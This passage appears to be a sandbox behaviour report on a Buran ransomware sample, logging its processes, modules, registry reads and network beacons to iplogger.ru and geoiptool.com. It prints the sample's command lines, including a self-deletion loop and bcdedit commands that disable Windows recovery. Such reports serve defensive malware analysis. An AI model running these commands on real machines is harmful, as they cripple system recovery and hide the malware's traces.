| Create | C:\Windows\system32\cmd.exe | os_pid = 0x7c8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x8d0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x8f8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x974, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x920, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x940, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x9ac, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
Module (31)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.ENU | base_address = 0x0 |
|
1 | |
| Load | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.EN | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe | base_address = 0xbb0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x75220000 |
|
1 | |
| Get Filename | c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe | process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 |
|
1 | |
| Get Filename | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.EN | process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExA, address_out = 0x76cb434f |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x75224c28 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x7529c802 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x7529ec66 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x75245934 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x7529d332 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x7529dbd4 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x7529e405 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x7529f00a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x7529f15e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x75245a98 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x7529ecfa |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x7529ee2e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x7523b0dc |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x75236fab |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x752401a0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x7523699e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x75246ba7 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x75266c12 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x7523dbd1 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x75247fdc |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x75237a2a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x75240355 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
Keyboard (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 0, result_out = 4 |
|
1 |
System (503)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
5 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
491 | |
| Get Time | type = Performance Ctr, time = 16305346374 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16778868255 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16778873646 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16778878676 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16778883643 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16778888639 |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = TEMP, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp |
|
2 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
17 |
Network Behavior
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 153 bytes |
| Total Data Received | 965 bytes |
| Contacted Host Count | 2 |
| Contacted Hosts | 88.99.66.31, 158.69.67.193 |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | geoiptool.com |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 39 bytes |
| Data Received | 380 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = http, server_name = geoiptool.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://geoiptool.com |
|
1 | |
| Read Response | size = 1024, size_out = 1024 |
|
19 | |
| Read Response | size = 1024, size_out = 872 |
|
1 | |
| Read Response | size = 1024, size_out = 0 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | BURAN |
| Server Name | iplogger.ru |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 114 bytes |
| Data Received | 585 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = iplogger.ru, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = 1GJci7.html, accept_types = 0, flags = INTERNET_FLAG_IDN_DIRECT, INTERNET_FLAG_IDN_PROXY |
|
1 | |
| Add HTTP Request Headers | headers = Host: iplogger.ru User-Agent: BURAN Referer: 20D3E156-A287-60BB-BBEE-4579C665442A |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = iplogger.ru/1GJci7.html |
|
1 | |
| Read Response | size = 4097, size_out = 116 |
|
1 | |
| Read Response | size = 4097, size_out = 0 |
|
1 | |
| Close Session | - |
|
1 |
Process #9: cmd.exe
143
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe" & if not exist "C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe" exit ) |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:00:42, Reason: Child Process |
| Unmonitor | End Time: 00:00:46, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xafc |
| Parent PID | 0x9cc (c:\users\5p5nrg~1\appdata\local\temp\buran.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B00
|
Host Behavior
File (91)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
16 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
51 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 4 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 13 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Delete | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\PING.EXE | os_pid = 0xb20, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4abc0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:14 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 108717 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16320310695 |
|
1 |
Environment (21)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = x in (1,1,999) do ( ping -n 3 127.1 & del "C |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #10: ping.exe
25
1
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\syswow64\ping.exe |
| Command Line | ping -n 3 127.1 |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:00:43, Reason: Child Process |
| Unmonitor | End Time: 00:00:46, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb20 |
| Parent PID | 0xafc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B24
0x
B34
0x
B38
0x
B40
|
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 9 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 92 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 97 |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | value_name = DefaultTTL, data = 0, type = REG_NONE |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\ping.exe | base_address = 0x510000 |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
2 | |
| Get Time | type = System Time, time = 2019-07-04 15:37:14 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 108966 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16351571275 |
|
1 |
Network Behavior
ICMP (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Send ICMP Echo | source_address = 0.0.0.0, destination_address = 127.0.0.1, timeout = 4000 |
|
3 |
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = 127.1, address_out = 127.0.0.1 |
|
1 |
Process #11: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:00:53, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb78 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B7C
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 98 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 117952 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17276737896 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 |
Process #12: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:00:54, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb90 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B94
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 98 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a150000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
